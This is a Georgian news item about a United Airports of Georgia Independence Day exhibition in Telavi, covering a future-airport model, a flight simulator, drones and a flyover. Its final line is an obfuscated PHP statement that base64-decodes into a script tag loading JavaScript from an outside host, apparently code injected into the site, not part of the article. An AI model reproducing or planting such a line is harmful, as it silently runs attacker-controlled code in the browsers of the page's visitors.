celsiusi
ავერსი საქკაბელი

 საქართველოს აეროპორტების გაერთიანება დამოუკიდებლობის დღეს, თელავის ერეკლე მეორის სახელობის აეროპორტის გაცოცხლებული კონცეფციით კახეთში, თელავის ცენტრალურ მოედანზეა წარმოდგენილი. ვიზიტორებს საინტერესო და ორიგინალური ინსტალაციები, თანამედროვე დიზაინის, ინტერაქციული და ინფორმაციული სივრცე ხვდებათ, რომელიც ავიაციისა და აეროპორტების თემატიკით არის გაჯერებული.

თელავის ცენტრალურ მოედანზე წარმოდგენილი თელავის მომავალი აეროპორტის მაკეტი, სადაც მოსულ ვიზიტორებს ხვდებათ რეგისტრაციის იმიტაცია და გადაეცემათ სამგზავრო ბილეთი ე.წ. Boarding pass. ასევე, წარმოდგენილია ფრენის სიმულაციის ბოქსი, რომლის საშუალებითაც ადგილზე მოსულ ვიზიტორებს შეუძლიათ ვირტუალურად მართონ საჰაერო ხომალდი. თელავის ცენტრალურ მოედანზე წარმოდგენილია მრავალფუნქციური საგამოფენო ფოტო-ზონა, საინფორმაციო დაფები აეროპორტების მიხედვით, ასაფრენი ბილიკის ფოტო-ზონა, საბავშვო თვითმფრინავის ფოტო-ზონა, ასევე, ქართული წარმოების სამაშველო და სატვირთო დრონები.

თელავის ცენტრალურ მოედანზე პირველად არის წარმოდგენილი აეროკლუბ ,,ავიატორის“ კუთვნილი 2 ადგილიანი, ქართული წარმოების ზემსუბუქი სამგზავრო საჰაერო ხომალდი. სადაც ვიზიტორებს შეუძლიათ ჩასხნდნენ და ფოტოები გადაიღონ.

ზუსტად 17 საათსა და 10 წუთზე, როცა 106 წლის წინ, ქვეყნის სახელმწიფოებრივი დამოუკიდებლობის აღდგენის აქტს ხელი მოეწერა, საქართველოს აეროპორტების გაერთიანების ჩართულობით, თელავის მოქმედი აეროდრომიდან, საავიაციო უნივერსიტეტის ორი საჰაერო ხომალდი აფრინდება და თელავის თავზე მწყობრში გადაიფრენს. თელავის ცენტრალური მოედნის გარდა, საქართველოს აეროპორტების გაერთიანებამ დამოუკიდებლობის დღისთვის, საერთაშორისო და ადგილობრივი აეროპორტები 26 მაისის თემატიკით გააფორმა.

186
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");